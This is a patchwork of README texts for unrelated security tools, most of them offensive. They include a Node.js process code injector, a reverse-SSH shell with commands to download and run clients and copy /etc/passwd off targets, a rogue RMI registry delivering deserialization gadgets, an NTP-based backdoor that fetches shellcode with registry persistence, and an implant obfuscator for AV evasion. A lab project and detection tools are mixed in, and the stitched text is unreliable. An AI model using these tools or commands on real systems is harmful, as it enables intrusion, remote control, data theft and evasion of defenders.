jscythe abuses the node.js inspector mechanism in order to force any node.js/electron/v8 based process to execute arbitrary javascript code, even if their debugging capabilities are disabled.
Tested and working against Visual Studio Code, Discord, any Node.js application and more!
How it works:

1. jscythe sends a SIGUSR1 signal to the target process; this enables the debugger on a port (depending on the software, sometimes it's random, sometimes it's not).
2. It fetches the debugging WebSocket URL from http://localhost:<port>/json.
3. It issues a Runtime.evaluate request with the provided code.

Build with:

cargo build --release
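The steps above can be sketched in Python (hypothetical helper names; jscythe itself is written in Rust, and actually delivering the message requires a WebSocket client):

```python
import json

def evaluate_message(code: str, msg_id: int = 1) -> str:
    """Build the DevTools-protocol Runtime.evaluate request that is
    ultimately sent over the inspector WebSocket."""
    return json.dumps({
        "id": msg_id,
        "method": "Runtime.evaluate",
        "params": {
            "expression": code,
            # exposes require() and friends inside the evaluated expression
            "includeCommandLineAPI": True,
            "replMode": True,
        },
    })

def pick_ws_url(targets: list) -> str:
    """Pick the debugger WebSocket URL out of the /json target list."""
    return targets[0]["webSocketDebuggerUrl"]

# Shape of what http://localhost:<port>/json returns (illustrative only)
targets = [{"webSocketDebuggerUrl": "ws://localhost:9229/abc-123"}]
msg = evaluate_message("5 - 3 + 2")
```

Sending `msg` over the returned WebSocket is what makes the target evaluate the expression.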
Target a specific process and execute a basic expression:
./target/release/jscythe --pid 666 --code "5 - 3 + 2"
Execute code from a file:
./target/release/jscythe --pid 666 --script example_script.js
The example_script.js
can require any node module and execute any code, like:
require('child_process').spawnSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator', { encoding : 'utf8' }).stdout
Search process by expression:
./target/release/jscythe --search extensionHost --script example_script.js
Run jscythe --help for the complete list of options.
This project is made with ♥ by @evilsocket and it is released under the GPL3 license.
Deliberately vulnerable CI/CD environment. Hack CI/CD pipelines, capture the flags.
Created by Cider Security.
The CI/CD Goat project allows engineers and security practitioners to learn and practice CI/CD security through a set of 10 challenges, enacted against a real, full-blown CI/CD environment. The scenarios are of varying difficulty levels, with each scenario focusing on one primary attack vector.
The challenges cover the Top 10 CI/CD Security Risks, including Insufficient Flow Control Mechanisms, PPE (Poisoned Pipeline Execution), Dependency Chain Abuse, PBAC (Pipeline-Based Access Controls), and more.
The different challenges are inspired by Alice in Wonderland, each one is themed as a different character.
The project’s environment is based on Docker images and can be run locally. These images are:
The images are configured to interconnect in a way that creates fully functional pipelines.
There's no need to clone the repository.

Linux & Mac:

curl -o cicd-goat/docker-compose.yaml --create-dirs https://raw.githubusercontent.com/cider-security-research/cicd-goat/main/docker-compose.yaml
cd cicd-goat && docker-compose up -d

Windows (PowerShell):

mkdir cicd-goat; cd cicd-goat
curl -o docker-compose.yaml https://raw.githubusercontent.com/cider-security-research/cicd-goat/main/docker-compose.yaml
(get-content docker-compose.yaml) | %{$_ -replace "bridge","nat"} | set-content docker-compose.yaml
docker-compose up -d
After starting the containers, it might take up to 5 minutes until the containers' configuration process is complete.
Login to CTFd at http://localhost:8000 to view the challenges:

Username: alice
Password: alice

Hack:

Jenkins (username: alice, password: alice)
Gitea (username: thealice, password: thealice)
Insert the flags on CTFd and find out if you got it right.
Warning: Spoilers!
See Solutions.
Clone the repository.
Rename .git folders to make them usable:
python3 rename.py git
Install testing dependencies:
pip3 install pipenv==2022.8.30
pipenv install --deploy
Run the development environment to experiment with new changes:
rm -rf tmp tmp-ctfd/
cp -R ctfd/data/ tmp-ctfd/
docker-compose -f docker-compose-dev.yaml up -d
Make the desired changes:
Shutdown the environment, move changes made in CTFd and rebuild it:
docker-compose -f docker-compose-dev.yaml down
./apply.sh # save CTFd changes
docker-compose -f docker-compose-dev.yaml up -d --build
Run tests:
pytest tests/
Rename .git folders to allow push:
python3 rename.py notgit
Commit and push!
Follow the checklist below to add a challenge:
Want to use SSH for reverse shells? Now you can.
+----------------+ +---------+
| | | |
| | +---------+ RSSH |
| Reverse | | | Client |
| SSH server | | | |
| | | +---------+
+---------+ | | |
| | | | |
| Human | SSH | | SSH | +---------+
| Client +-------->+ <-----------------+ |
| | | | | | RSSH |
+---------+ | | | | Client |
| | | | |
| | | +---------+
| | |
| | |
+----------------+ | +---------+
| | |
| | RSSH |
+---------+ Client |
| |
+---------+
Docker:
docker run -p3232:2222 -e EXTERNAL_ADDRESS=<your_external_address>:3232 -e SEED_AUTHORIZED_KEYS="$(cat ~/.ssh/id_ed25519.pub)" -v data:/data reversessh/reverse_ssh
Manual:
git clone https://github.com/NHAS/reverse_ssh
cd reverse_ssh
make
cd bin/
# start the server
cp ~/.ssh/id_ed25519.pub authorized_keys
./server 0.0.0.0:3232
# copy client to your target then connect it to the server
./client your.rssh.server.com:3232
# Get help text
ssh your.rssh.server.com -p 3232 help
# See clients
ssh your.rssh.server.com -p 3232 ls -t
Targets
+------------------------------------------+------------+-------------+
| ID | Hostname | IP Address |
+------------------------------------------+------------+-------------+
| 0f6ffecb15d75574e5e955e014e0546f6e2851ac | root.wombo | [::1]:45150 |
+------------------------------------------+------------+-------------+
# Connect to full shell
ssh -J your.rssh.server.com:3232 0f6ffecb15d75574e5e955e014e0546f6e2851ac
# Or using hostname
ssh -J your.rssh.server.com:3232 root.wombo
NOTE: reverse_ssh requires Go 1.17 or higher. Please check that you have at least this version via
go version
The simplest build command is just:
make
Make will build both the client and server binaries. It will also generate a private key for the client, and copy the corresponding public key to the authorized_controllee_keys file to enable the reverse shell to connect.
Go lets you cross-compile effortlessly; the following example builds a Windows client:
GOOS=windows GOARCH=amd64 make client # will create client.exe
You will need to create an authorized_keys file, much like the SSH authorized_keys(5) file (http://man.he.net/man5/authorized_keys); it contains your public key and allows you to connect to the RSSH server.
Alternatively, you can use the --authorizedkeys flag to point to a file.
cp ~/.ssh/id_ed25519.pub authorized_keys
./server 0.0.0.0:3232 #Set the server to listen on port 3232
Put the client binary on whatever you want to control, then connect to the server.
./client your.rssh.server.com:3232
You can then see what reverse shells have connected to you using ls:
ssh your.rssh.server.com -p 3232 ls -t
Targets
+------------------------------------------+------------+-------------+
| ID | Hostname | IP Address |
+------------------------------------------+------------+-------------+
| 0f6ffecb15d75574e5e955e014e0546f6e2851ac | root.wombo | [::1]:45150 |
+------------------------------------------+------------+-------------+
Then typical ssh commands work, just specify your rssh server as a jump host.
# Connect to full shell
ssh -J your.rssh.server.com:3232 root.wombo
# Run a command without pty
ssh -J your.rssh.server.com:3232 root.wombo help
# Start remote forward
ssh -R 1234:localhost:1234 -J your.rssh.server.com:3232 root.wombo
# Start dynamic forward
ssh -D 9050 -J your.rssh.server.com:3232 root.wombo
# SCP
scp -J your.rssh.server.com:3232 root.wombo:/etc/passwd .
# SFTP
sftp -J your.rssh.server.com:3232 root.wombo:/etc/passwd .
Specify a default server at build time:
$ RSSH_HOMESERVER=your.rssh.server.com:3232 make
# Will connect to your.rssh.server.com:3232, even though no destination is specified
$ bin/client
# Behaviour is otherwise normal; will connect to the supplied host, e.g example.com:3232
$ bin/client example.com:3232
The RSSH server can also run an HTTP server on the same port as the RSSH listener to serve client binaries. The server must be placed in the project bin/ folder, as it needs to find the client source.
./server --webserver :3232
# Generate an unnamed link
ssh your.rssh.server.com -p 3232
catcher$ link -h
link [OPTIONS]
Link will compile a client and serve the resulting binary on a link which is returned.
This requires the web server component has been enabled.
-t Set number of minutes link exists for (default is one time use)
-s Set homeserver address, defaults to server --external_address if set, or server listen address if not.
-l List currently active download links
-r Remove download link
--goos Set the target build operating system (default to runtime GOOS)
--goarch Set the target build architecture (default to runtime GOARCH)
--name Set link name
--shared-object Generate shared object file
--fingerprint Set RSSH server fingerprint; defaults to server public key
--upx Use upx to compress the final binary (requires upx to be installed)
--garble Use garble to obfuscate the binary (requires garble to be installed)
# Build a client binary
catcher$ link --name test
http://your.rssh.server.com:3232/test
Then you can download it as follows:
wget http://your.rssh.server.com:3232/test
chmod +x test
./test
You can compile the client as a DLL to be loaded with something like Invoke-ReflectivePEInjection. This needs a cross compiler if you are building on Linux; use mingw-w64-gcc.
CC=x86_64-w64-mingw32-gcc GOOS=windows RSSH_HOMESERVER=192.168.1.1:2343 make client_dll
When the RSSH server has the webserver enabled you can also compile it with the link command:
./server --webserver :3232
# Generate an unnamed link
ssh your.rssh.server.com -p 3232
catcher$ link --name windows_dll --shared-object --goos windows
http://your.rssh.server.com:3232/windows_dll
Which is useful when you want to do fileless injection of the rssh client.
The SSH ecosystem lets you define and call subsystems with the -s flag. In RSSH this is repurposed to provide special commands per platform.

list: Lists available subsystems
sftp: Runs the sftp handler to transfer files
setgid: Attempt to change group
setuid: Attempt to change user
service: Installs or removes the rssh binary as a windows service; requires administrative rights

e.g.
# Install the rssh binary as a service (windows only)
ssh -J your.rssh.server.com:3232 test-pc.user.test-pc -s service --install
The client RSSH binary supports being run within a Windows service and won't time out after 10 seconds. This is great for creating persistent management services.
Most reverse shells for windows struggle to generate a shell environment that supports resizing, copying and pasting and all the other features that we're all very fond of. This project uses conpty on newer versions of windows, and the winpty library (which self unpacks) on older versions. This should mean that almost all versions of windows will net you a nice shell.
The RSSH server can send out raw HTTP requests configured using the webhook command from the terminal interface.
First enable a webhook:
$ ssh your.rssh.server.com -p 3232
catcher$ webhook --on http://localhost:8080/
Then disconnect or connect a client; this will then issue a POST request with the following format.
$ nc -l -p 8080
POST /rssh_webhook HTTP/1.1
Host: localhost:8080
User-Agent: Go-http-client/1.1
Content-Length: 165
Content-Type: application/json
Accept-Encoding: gzip
{"Status":"connected","ID":"ae92b6535a30566cbae122ebb2a5e754dd58f0ca","IP":"[::1]:52608","HostName":"user.computer","Timestamp":"2022-06-12T12:23:40.626775318+12:00"}
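A minimal Python sketch for consuming that payload (field names taken from the sample body above; the helper name is hypothetical):

```python
import json

# Sample body, shaped like the RSSH webhook POST above
SAMPLE = ('{"Status":"connected","ID":"ae92b6535a30566cbae122ebb2a5e754dd58f0ca",'
          '"IP":"[::1]:52608","HostName":"user.computer",'
          '"Timestamp":"2022-06-12T12:23:40.626775318+12:00"}')

def parse_webhook(body: str) -> dict:
    """Extract the fields an operator typically cares about."""
    event = json.loads(body)
    return {
        "status": event["Status"],
        "client_id": event["ID"],
        "hostname": event["HostName"],
        "ip": event["IP"],
    }

event = parse_webhook(SAMPLE)
```

A real receiver would sit behind the URL you pass to `webhook --on` and run this on every POST body.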
RSSH and SSH support creating tuntap interfaces that allow you to route traffic and create a pseudo-VPN. It takes a bit more setup than just a local or remote forward (-L, -R), but in this mode you can send UDP and ICMP.
First set up a tun (layer 3) device on your local machine.
sudo ip tuntap add dev tun0 mode tun
sudo ip addr add 172.16.0.1/24 dev tun0
sudo ip link set dev tun0 up
# Route all non-local network traffic through the tunnel by default
sudo ip route add 0.0.0.0/0 via 172.16.0.1 dev tun0
Install a client on a remote machine. This will not work if your RSSH client is on the same host as your tun device.
ssh -J your.rssh.server.com:3232 user.wombo -w 0:any
This has some limitations: it can only send UDP/TCP/ICMP, not arbitrary layer 3 protocols. ICMP is best effort and may use the remote host's ping tool, as ICMP sockets are privileged on most machines. This also does not support tap devices (i.e. layer 2 VPN), as that would require administrative access.
To enable the --garble flag of the link command you must install garble, a tool for obfuscating Go binaries. However, the @latest release has a bug that causes panics with generic code.
If you are installing it manually, use the following:
go install mvdan.cc/garble@f9d9919
Then make sure that the go/bin/ directory is in your $PATH.
Unfortunately the upstream Go crypto/ssh library does not support rsa-sha2-* algorithms, and work is currently ongoing here:
So until that work is completed, you will have to generate a different (non-rsa) key. I recommend the following:
ssh-keygen -t ed25519
Due to limitations of SFTP (or rather the library I'm using for it), paths need a little more effort on Windows:

sftp -r -J your.rssh.server.com:3232 test-pc.user.test-pc:'/C:/Windows/system32'

Note the / before the drive letter.
By default, clients will run in the background. When started they will execute a new background instance (thus forking a new child process) and then the parent process will exit. If the fork is successful the message "Ending parent" will be printed.
This has one important ramification: once in the background, a client will not show any output, including connection failure messages. If you need to debug your client, use the --foreground flag.
Ermir is an Evil/Rogue RMI Registry; it exploits insecure deserialization in any Java code calling the standard RMI methods on it (list()/lookup()/bind()/rebind()/unbind()).
Install Ermir from rubygems.org:
$ gem install ermir
or clone the repo and build the gem:
$ git clone https://github.com/hakivvi/ermir.git
$ rake install
Ermir is a CLI gem. It ships two executables, ermir and gadgetmarshal: ermir is the actual tool, while gadgetmarshal is just a friendly interface to the GadgetMarshaller.java file, which rewrites Ysoserial gadgets to match MarshalInputStream requirements. Its output should then be piped into ermir or written to a file. For custom gadgets, use MarshalOutputStream instead of ObjectOutputStream to write your serialized object to the output stream.
ermir usage:
➜ ~ ermir
Ermir by @hakivvi * https://github.com/hakivvi/ermir.
Info:
Ermir is a Rogue/Evil RMI Registry which exploits unsecure Java deserialization on any Java code calling standard RMI methods on it.
Usage: ermir [options]
-l, --listen bind the RMI Registry to this ip and port (default: 0.0.0.0:1099).
-f, --file path to file containing the gadget to be deserialized.
-p, --pipe read the serialized gadget from the standard input stream.
-v, --version print Ermir version.
-h, --help print options help.
Example:
$ gadgetmarshal /path/to/ysoserial.jar Groovy1 calc.exe | ermir --listen 127.0.0.1:1099 --pipe
gadgetmarshal usage:
➜ ~ gadgetmarshal
Usage: gadgetmarshal /path/to/ysoserial.jar Gadget1 cmd (optional)/path/to/output/file
java.rmi.registry.Registry offers 5 methods: list(), lookup(), bind(), rebind(), unbind():
public Remote lookup(String name): lookup() searches for a bound object in the registry by its name. The registry returns a Remote object referencing the remote object that was looked up. The returned object is read using MarshalInputStream.readObject(), which is just another layer on top of ObjectInputStream: it expects, after each class/proxy descriptor (TC_CLASSDESC/TC_PROXYCLASSDESC), a URL that will be used to load that class or proxy class. This is the same wild bug that was fixed in jdk7u21. (Ermir does not specify this URL, as only old Java versions are vulnerable; it just writes null.) As Ysoserial gadgets are serialized using ObjectOutputStream, Ermir uses gadgetmarshal (a wrapper around GadgetMarshaller.java) to serialize the specified gadget to match MarshalInputStream requirements.
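As a toy illustration of that stream-level difference (Ermir itself is written in Ruby; this Python sketch only shows the standard Java serialization grammar constants and the extra "location" annotation a MarshalInputStream reads after each class descriptor):

```python
import struct

# Standard Java Object Serialization constants (java.io.ObjectStreamConstants)
STREAM_MAGIC   = 0xACED
STREAM_VERSION = 0x0005
TC_NULL        = 0x70  # written as the codebase annotation when no URL is advertised
TC_STRING      = 0x74

def stream_header() -> bytes:
    """Every Java serialization stream starts with magic + version."""
    return struct.pack(">HH", STREAM_MAGIC, STREAM_VERSION)

def location_annotation(url=None) -> bytes:
    """The per-class-descriptor annotation MarshalInputStream expects:
    a codebase URL string, or TC_NULL when none is given (what Ermir
    writes, since only old JVMs honor the URL)."""
    if url is None:
        return bytes([TC_NULL])
    # TC_STRING followed by a 2-byte length-prefixed modified-UTF8 string
    return bytes([TC_STRING]) + struct.pack(">H", len(url)) + url
```

This is exactly the extra byte (or string) that a plain ObjectOutputStream never emits, which is why Ysoserial gadgets must be re-serialized by gadgetmarshal.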
public String[] list(): list() asks the registry for the names of all bound objects. The String type itself cannot be substituted with a malicious gadget: it is not an ordinary object and is read using readUTF() rather than readObject(). However, list() returns String[], which is an actual object and is read using readObject(), so Ermir sends the gadget in place of that String[].
public void bind(java.lang.String $param_String_1, java.rmi.Remote $param_Remote_2): bind() binds an object to a name on the registry. In bind()'s case the return type is void and nothing is returned. However, if the registry marks the RMI return data packet as an exceptional return, the client will call readObject() even though the return type is void; this is how the registry sends exceptions to its clients (usually java.lang.ClassNotFoundException). Once again Ermir delivers the serialized gadget instead of a legitimate Exception object.
public void rebind(java.lang.String $param_String_1, java.rmi.Remote $param_Remote_2): rebind() replaces the binding of the passed name with the supplied remote reference. It also returns void, so Ermir returns an exception just like in bind().

public void unbind(java.lang.String $param_String_1): unbind() unbinds a remote object by name from the RMI registry. This one also returns void.
Bug reports and pull requests are welcome on GitHub at https://github.com/hakivvi/ermir. This project is intended to be a safe, welcoming space for collaboration, and contributors are expected to adhere to the code of conduct.
The gem is available as open source under the terms of the MIT License.
Everyone interacting in the Ermir project's codebases, issue trackers, chat rooms and mailing lists is expected to follow the code of conduct.
Threatest is a Go framework for testing threat detection end-to-end.
Threatest allows you to detonate an attack technique, and verify that the alert you expect was generated in your favorite security platform.
Read the announcement blog post: https://securitylabs.datadoghq.com/articles/threatest-end-to-end-testing-threat-detection/
A detonator describes how and where an attack technique is executed.
Supported detonators:
An alert matcher is a platform-specific integration that can check if an expected alert was triggered.
Supported alert matchers:
Each detonation is assigned a UUID. This UUID is reflected in the detonation and used to ensure that the matched alert corresponds exactly to this detonation.
The way this is done depends on the detonator; for instance, Stratus Red Team and the AWS Detonator inject it in the user-agent; the SSH detonator uses a parent process containing the UUID.
See examples for complete usage example.
threatest := Threatest()
threatest.Scenario("AWS console login").
WhenDetonating(StratusRedTeamTechnique("aws.initial-access.console-login-without-mfa")).
Expect(DatadogSecuritySignal("AWS Console login without MFA").WithSeverity("medium")).
WithTimeout(15 * time.Minute)
assert.NoError(t, threatest.Run())
ssh, _ := NewSSHCommandExecutor("test-box", "", "")
threatest := Threatest()
threatest.Scenario("curl to metadata service").
WhenDetonating(NewCommandDetonator(ssh, "curl http://169.254.169.254 --connect-timeout 1")).
Expect(DatadogSecuritySignal("EC2 Instance Metadata Service Accessed via Network Utility"))
assert.NoError(t, threatest.Run())
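The UUID correlation described above can be sketched in Python (hypothetical helper names; Threatest itself is written in Go):

```python
import uuid

def detonate(user_agent_base: str):
    """Simulate a detonation: return the detonation UUID plus the
    user-agent a detonator would send (Stratus Red Team / AWS style)."""
    det_id = str(uuid.uuid4())
    return det_id, f"{user_agent_base} threatest_{det_id}"

def alert_matches(alert: dict, det_id: str) -> bool:
    """An alert corresponds to our detonation iff it carries the UUID."""
    return det_id in alert.get("user_agent", "")

det_id, ua = detonate("aws-sdk-go/1.44")
# An alert the security platform might raise for this detonation
alert = {"rule": "AWS Console login without MFA", "user_agent": ua}
```

Matching on the UUID rather than on timing guarantees the matched alert belongs to this detonation and not a concurrent one.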
Sandman is a backdoor that is meant to work on hardened networks during red team engagements.
Sandman works as a stager: it leverages NTP (the protocol used to sync time and date) to fetch and run an arbitrary shellcode from a pre-defined server. Since NTP is overlooked by many defenders, it usually enjoys wide network accessibility.
Run on windows / *nix machine:
python3 sandman_server.py "Network Adapter" "Payload Url" "optional: ip to spoof"
Network Adapter: The adapter that you want the server to listen on (for example Ethernet for Windows, eth0 for *nix).
Payload Url: The URL to your shellcode, it could be your agent (for example, CobaltStrike or meterpreter) or another stager.
IP to Spoof: If you want to spoof a legitimate IP address (for example, time.microsoft.com's IP address).
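For context, here is what a minimal NTP client packet looks like (a generic NTPv3 sketch, not Sandman's actual wire format; the point is that this 48-byte datagram on UDP/123 is what most firewalls wave through):

```python
import struct

def ntp_request() -> bytes:
    """A minimal 48-byte NTPv3 client packet: LI=0, VN=3, Mode=3 (client),
    all remaining fields zeroed."""
    li_vn_mode = (0 << 6) | (3 << 3) | 3  # packs LI/VN/Mode into the first byte
    return struct.pack("!B", li_vn_mode) + b"\x00" * 47

pkt = ntp_request()
```

A covert channel like Sandman's hides its data inside fields of packets shaped like this, so traffic inspection sees ordinary time-sync requests.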
To start, you can compile the SandmanBackdoor as mentioned below; because it is a single lightweight C# executable, you can execute it via ExecuteAssembly, run it as an NTP provider, or just execute/inject it.
To use it, you will need to follow simple steps:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Path\To\TheDll.dll"
sc stop w32time
sc start w32time
NOTE: Make sure you are compiling with the x64 option and not any CPU option!
Getting and executing an arbitrary payload from an attacker's controlled server.
Can work on hardened networks since NTP is usually allowed in FW.
Impersonating a legitimate NTP server via IP spoofing.
Python 3.9
The requirements are specified in the requirements file.
To compile the backdoor I used Visual Studio 2022, but as mentioned in the usage section it can be compiled with both VS2022 and csc. You can compile it either with USE_SHELLCODE, to use Orca's shellcode, or without USE_SHELLCODE, to use WebClient.

To compile the time-provider DLL I also used Visual Studio 2022; you will additionally need to install DllExport (via NuGet or any other way). The same USE_SHELLCODE switch applies here.
A shellcode is injected into RuntimeBroker.
Suspicious NTP communication starts with a known magic header.
YARA rule.
Orca for the shellcode.
Special thanks to Tim McGuffin for the time provider idea.
Thanks to those who have already contributed. I'll happily accept contributions: make a pull request and I will review it!
EDR with artifact collection driven by detection. The detection engine is built on top of a previous project, Gene, specially designed to match Windows events against user-defined rules.
It means that an alert can directly trigger artifact collection (file, registry, process memory). This way you are sure you collected the artifacts as soon as possible (near real time).
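The alert-triggers-collection loop can be sketched as follows (a toy Python matcher; real WHIDS rules are Gene rules matching Windows events, and the read_file stub plus field names here are hypothetical):

```python
import hashlib

def match(rule: dict, event: dict) -> bool:
    """Toy matcher: every field listed in the rule must equal the event's."""
    return all(event.get(k) == v for k, v in rule["match"].items())

def collect(event: dict, read_file) -> dict:
    """On alert, immediately grab the artifact so it cannot disappear."""
    data = read_file(event["image"])
    return {"path": event["image"], "sha256": hashlib.sha256(data).hexdigest()}

rule = {"name": "suspicious-image", "match": {"channel": "Sysmon", "event_id": 1}}
event = {"channel": "Sysmon", "event_id": 1, "image": r"C:\evil.exe"}

# Detection drives collection: only matched events trigger a grab
artifact = collect(event, read_file=lambda p: b"MZ...") if match(rule, event) else None
```

The key design point is that collection happens inside the detection path, not as a later forensic step, which is why the artifact is still there when you need it.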
All this work has been done in my free time in the hope it would help other people; I hope you will enjoy it. Unless I get some funding to further develop this project, I will continue doing so in my free time. I will do all I can to fix issues in time and provide updates. Feel free to open issues to improve the project and keep it alive.
NB: the EDR agent can be run standalone (without being connected to an EDR manager)
NB: event filtering can be done at 100% with Gene rules so do not bother creating a complicated Sysmon configuration.
In order to get the most of WHIDS you might want to improve your logging policy.
Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\System Audit Policies\System\Audit Security System Extension -> Enable
Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\System Audit Policies\Object Access\Audit File System -> Enable

Then, in the auditing settings of the folders you want to watch:

Select a principal: put here the name of the user/group you want the audit for (use the group Everyone to log access from any user).
Applies to: selects the scope of this audit policy, starting from the folder you have selected.
Basic permissions: select the kinds of accesses you want the logs to be generated for.

Both the Security log channel and Microsoft-Windows-Windows Defender/Operational are monitored by the EDR.

This section covers the installation of the agent on the endpoint.
Run manage.bat as administrator.
Edit the configuration with manage.bat or using your preferred text editor.
Restart the services with manage.bat, or just reboot (preferred option, otherwise some enrichment fields will be incomplete, leading to false alerts).

NB: At installation time the Sysmon service is made dependent on the WHIDS service, so that the EDR is guaranteed to run before Sysmon starts generating events.
The EDR manager can be installed on several platforms, pre-built binaries are provided for Windows, Linux and Darwin.
Please visit doc/configuration.md
If \\vbox\test is mounted as the Z: drive, running Z:\whids.exe won't work, while running \\vbox\test\whids.exe actually would.

Github: https://github.com/tines | Website: https://www.tines.com/ | Twitter: @tines_io
Script that wraps around a multitude of packers, protectors, obfuscators, shellcode loaders, encoders and generators to produce complex, protected Red Team implants. Your perfect companion in a Malware Development CI/CD pipeline, helping watermark your artifacts, collect IOCs, backdoor and more.
ProtectMyToolingGUI.py
With ProtectMyTooling you can quickly obfuscate your binaries without worrying about clicking through dialogs, interfaces and menus, creating projects to obfuscate a single binary, or wading through all the available options and wasting time on that nonsense. It takes you straight to the point: obfuscating your tool.
The aim is to offer the most convenient interface possible and to let you leverage a daisy-chain of multiple packers combined on a single binary.
That's right: we can launch ProtectMyTooling with several packers at once:
C:\> py ProtectMyTooling.py hyperion,upx mimikatz.exe mimikatz-obf.exe
The above example will first pass mimikatz.exe to Hyperion for obfuscation, and then hand the result to UPX for compression, yielding UPX(Hyperion(file)). Similarly, callobf,hyperion,upx will produce the artifact UPX(Hyperion(CallObf(file))).
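The comma-separated chain is literally left-to-right function composition; a Python sketch (the pack() stub is hypothetical and only tracks the composition label, where a real pass would invoke the packer binary):

```python
from functools import reduce

def pack(packer: str, artifact: dict) -> dict:
    """Stub for one packer pass: a real implementation would run the
    packer executable; here we only track the composition label."""
    return {"label": f"{packer}({artifact['label']})"}

def chain(packers: str, infile: str) -> dict:
    """'a,b,c' applies left-to-right, so the last packer is outermost."""
    return reduce(lambda art, p: pack(p, art),
                  packers.split(","), {"label": infile})

out = chain("CallObf,Hyperion,UPX", "file")
```

So `chain("CallObf,Hyperion,UPX", "file")` yields the label UPX(Hyperion(CallObf(file))), matching the naming the tool reports.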
The Cobalt Strike integration adds protected-upload and protected-execute-assembly commands.

This tool was designed to work on Windows, as most packers natively target that platform. Some features may work on Linux just fine; nonetheless that support is not fully tested, so please report bugs and issues.
Add the contrib directory to your AV exclusions: that directory contains obfuscators and protectors which will get flagged by AV and removed.

PS C:\> git clone --recurse https://github.com/Binary-Offensive/ProtectMyTooling
Windows
PS C:\ProtectMyTooling> .\install.ps1
Linux
bash# ./install.sh
For the ScareCrow packer to run on Windows 10, WSL must be installed and bash.exe available (in %PATH%). Then, in WSL, one needs golang installed, in version at least 1.16:
cmd> bash
bash$ sudo apt update ; sudo apt upgrade -y ; sudo apt install golang=2:1.18~3 -y
To plug in supported obfuscators, change default options or point ProtectMyTooling to your obfuscator executable path, you will need to adjust the config\ProtectMyTooling.yaml configuration file.
There is also a config\sample-full-config.yaml file containing all the available options for all the supported packers, serving as a reference point.
Before ProtectMyTooling's first use, it is essential to adjust the program's YAML configuration file, ProtectMyTooling.yaml. Parameters are processed in the following order:
There, supported packer paths and options shall be set to enable them.
Usage is very simple, all it takes is to pass the name of obfuscator to choose, input and output file paths:
C:\> py ProtectMyTooling.py confuserex Rubeus.exe Rubeus-obf.exe
::::::::::.:::::::.. ... :::::::::::.,:::::: .,-::::::::::::::::
`;;;```.;;;;;;``;;;; .;;;;;;;;;;;;;;;\''';;;;\'\''',;;;'````;;;;;;;;\'\'''
`]]nnn]]' [[[,/[[[' ,[[ \[[, [[ [[cccc [[[ [[
$$$"" $$$$$$c $$$, $$$ $$ $$"""" $$$ $$
888o 888b "88bo"888,_ _,88P 88, 888oo,_`88bo,__,o, 88,
. YMMMb :.-:.MM ::-. "YMMMMMP" MMM """"YUMMM"YUMMMMMP" MMM
;;,. ;;;';;. ;;;;'
[[[[, ,[[[[, '[[,[[['
$$$$$$$$"$$$ c$$"
888 Y88" 888o,8P"`
::::::::::::mM... ... ::: :::::. :::. .,-:::::/
;;;;;;;;\'''.;;;;;;;. .;;;;;;;. ;;; ;;`;;;;, `;;,;;-'````'
[[ ,[[ \[[,[[ \[[,[[[ [[[ [[[[[. '[[[[ [[[[[[/
$$ $$$, $$$$$, $$$$$' $$$ $$$ "Y$c$"$$c. "$$
88, "888,_ _,88" 888,_ _,88o88oo,._888 888 Y88`Y8bo,,,o88o
MMM "YMMMMMP" "YMMMMMP"""""YUMMMMM MMM YM `'YMUP"YMM
Red Team implants protection swiss knife.
Multi-Packer wrapping around multitude of packers, protectors, shellcode loaders, encoders.
Mariusz Banach / mgeeky '20-'22, <mb@binary-offensive.com>
v0.15
[.] Processing x86 file: "\Rubeus.exe"
[.] Generating output of ConfuserEx(<file>)...
[+] SUCCEEDED. Original file size: 417280 bytes, new file size ConfuserEx(<file>): 756224, ratio: 181.23%
One can also obfuscate the file and immediately attempt to launch it (also with supplied optional parameters) to ensure it runs fine, using the options -r --cmdline CMDLINE:
The use case below takes beacon.exe on input and feeds it consecutively into the CallObf -> UPX -> Hyperion packers. It then injects the specified fooobar watermark into the final generated artifact's DOS stub, and modifies that artifact's checksum with the value 0xAABBCCDD.
Finally, ProtectMyTooling captures all IOCs (md5, sha1, sha256, imphash, and other metadata) and saves them in an auxiliary CSV file. That file can be used for IOC matching as the engagement unfolds.
PS> py .\ProtectMyTooling.py callobf,upx,hyperion beacon.exe beacon-obf.exe -i -I operation_chimera -w dos-stub=fooobar -w checksum=0xaabbccdd
[...]
[.] Processing x64 file: "beacon.exe"
[>] Generating output of CallObf(<file>)...
[.] Before obfuscation file's PE IMPHASH: 17b461a082950fc6332228572138b80c
[.] After obfuscation file's PE IMPHASH: 378d9692fe91eb54206e98c224a25f43
[>] Generating output of UPX(CallObf(<file>))...
[>] Generating output of Hyperion(UPX(CallObf(<file>)))...
[+] Setting PE checksum to 2864434397 (0xaabbccdd)
[+] Successfully watermarked resulting artifact file.
[+] IOCs written to: beacon-obf-ioc.csv
[+] SUCCEEDED. Original file size: 288256 bytes, new file size Hyperion(UPX(CallObf(<file>))): 175616, ratio: 60.92%
The produced IOC evidence CSV file will look as follows:
timestamp,filename,author,context,comment,md5,sha1,sha256,imphash
2022-06-10 03:15:52,beacon.exe,mgeeky@commandoVM,Input File,test,dcd6e13754ee753928744e27e98abd16,298de19d4a987d87ac83f5d2d78338121ddb3cb7,0a64768c46831d98c5667d26dc731408a5871accefd38806b2709c66cd9d21e4,17b461a082950fc6332228572138b80c
2022-06-10 03:15:52,y49981l3.bin,mgeeky@commandoVM,Obfuscation artifact: CallObf(<file>),test,50bbce4c3cc928e274ba15bff0795a8c,15bde0d7fbba1841f7433510fa9aa829f8441aeb,e216cd8205f13a5e3c5320ba7fb88a3dbb6f53ee8490aa8b4e1baf2c6684d27b,378d9692fe91eb54206e98c224a25f43
2022-06-10 03:15:53,nyu2rbyx.bin,mgeeky@commandoVM,Obfuscation artifact: UPX(CallObf(<file>)),test,4d3584f10084cded5c6da7a63d42f758,e4966576bdb67e389ab1562e24079ba9bd565d32,97ba4b17c9bd9c12c06c7ac2dc17428d509b64fc8ca9e88ee2de02c36532be10,9aebf3da4677af9275c461261e5abde3
